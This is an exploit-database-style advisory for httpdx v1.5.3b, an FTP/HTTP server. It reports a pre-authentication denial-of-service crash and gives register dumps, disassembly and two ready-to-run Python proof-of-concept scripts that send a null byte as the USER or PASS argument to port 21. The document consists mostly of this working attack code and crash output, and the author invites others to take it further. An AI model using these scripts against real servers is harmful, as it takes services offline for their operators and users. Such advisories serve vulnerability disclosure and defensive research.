# Title: httpdx v1.5.3b Multiple - Remote Pre-Authentication DoS (PoC crash)
# From: The eh?-Team || The Great White Fuzz (we're not sure yet)
# Found by: loneferret
# Hat's off to dookie2000ca
# Date: 13/03/2010
# Software link: http://httpdx.sourceforge.net/downloads/
# Tested on: Windows XP SP3 Professional

# Nod to the Exploit-DB Team

#Not to beat a dead horse, but when I saw the latest release notes
#about how he fixed a few security bugs. I figured I'd give this one
#another go at it.
#He did fix quite a few bugs, but he created this one in the process.
#I've included 2 PoCs for both the USER & PASS command.

#As always, if anyone wants to take this further, go right ahead.

#============================USER Command===============================
#CONTEXT DUMP
# EIP: 77c47b79 mov [edi],eax
# EAX: 00000000 ( 0) -> N/A
# EBX: fffffffa (4294967290) -> N/A
# ECX: 3ffff68b (1073739403) -> N/A
# EDX: 7efeff1f (2130640671) -> N/A
# EDI: 003f0000 ( 4128768) -> N/A
# ESI: 003eca36 ( 4114998) -> (heap)
# EBP: 0022dde4 ( 2285028) -> "@(>t"@@(>@@(>@@(>(>(> (stack)
# ESP: 0022ba9c ( 2275996) -> 0> (stack)
# +00: 003eca30 ( 4114992) -> USER (heap)
# +04: 00000000 ( 0) -> N/A
# +08: 00000000 ( 0) -> N/A
# +0c: 0040d663 ( 4249187) -> N/A
# +10: 003eda30 ( 4119088) -> (heap)
# +14: 003eca35 ( 4114997) -> (heap)

#disasm around:
# 0x77c47b61 and edx,0xff
# 0x77c47b67 mov [edi],edx
# 0x77c47b69 jmp 0x77c47b6f
# 0x77c47b6b xor edx,edx
# 0x77c47b6d mov [edi],edx
# 0x77c47b6f add edi,0x4
# 0x77c47b72 xor eax,eax
# 0x77c47b74 dec ecx
# 0x77c47b75 jz 0x77c47b81
# 0x77c47b77 xor eax,eax
# 0x77c47b79 mov [edi],eax
# 0x77c47b7b add edi,0x4
# 0x77c47b7e dec ecx
# 0x77c47b7f jnz 0x77c47b79
# 0x77c47b81 and ebx,0x3
# 0x77c47b84 jnz 0x77c47b0b
# 0x77c47b86 mov eax,[esp+0x10]
# 0x77c47b8a pop ebx
# 0x77c47b8b pop esi
# 0x77c47b8c pop edi
# 0x77c47b8d ret

#stack unwind:
# httpdx.exe:0040ffec
# kernel32.dll:7c80b713

#SEH unwind:
# ffffffff -> kernel32.dll:7c839ac0 push ebp

#!/usr/bin/python

import socket

buffer = "\000"

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('xxx.xxx.xxx.xxx',21)) #Remember to put in the server's address
s.recv(1024)
s.send('USER '+ buffer +'\r\n')
s.recv(1024)
s.close


#============================PASS Command===============================

#CONTEXT DUMP
# EIP: 77c47b79 mov [edi],eax
# EAX: 00000000 ( 0) -> N/A
# EBX: fffffffa (4294967290) -> N/A
# ECX: 3ffed77d (1073665917) -> N/A
# EDX: 7efeff1f (2130640671) -> N/A
# EDI: 00c63000 ( 12988416) -> N/A
# ESI: 00c17cfe ( 12680446) -> (heap)
# EBP: 0186dde4 ( 25615844) -> @|t@@|@@|@@||| (stack)
# ESP: 0186ba9c ( 25606812) -> |)@| PASS (heap)
# +04: 00000000 ( 0) -> N/A
# +08: 00000000 ( 0) -> N/A
# +0c: 0040d729 ( 4249385) -> N/A
# +10: 00c18df8 ( 12684792) -> (heap)
# +14: 00c17cfd ( 12680445) -> (heap)

#disasm around:
# 0x77c47b61 and edx,0xff
# 0x77c47b67 mov [edi],edx
# 0x77c47b69 jmp 0x77c47b6f
# 0x77c47b6b xor edx,edx
# 0x77c47b6d mov [edi],edx
# 0x77c47b6f add edi,0x4
# 0x77c47b72 xor eax,eax
# 0x77c47b74 dec ecx
# 0x77c47b75 jz 0x77c47b81
# 0x77c47b77 xor eax,eax
# 0x77c47b79 mov [edi],eax
# 0x77c47b7b add edi,0x4
# 0x77c47b7e dec ecx
# 0x77c47b7f jnz 0x77c47b79
# 0x77c47b81 and ebx,0x3
# 0x77c47b84 jnz 0x77c47b0b
# 0x77c47b86 mov eax,[esp+0x10]
# 0x77c47b8a pop ebx
# 0x77c47b8b pop esi
# 0x77c47b8c pop edi
# 0x77c47b8d ret

#stack unwind:
# httpdx.exe:0040ffec
# kernel32.dll:7c80b713

#SEH unwind:
# ffffffff -> kernel32.dll:7c839ac0 push ebp

#!/usr/bin/python

import socket

buffer = "\000"

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('xxx.xxx.xxx.xxx',21)) #Remember to put in the server's address
s.recv(1024)
s.send('USER test\r\n')
s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
s.recv(1024)
s.close 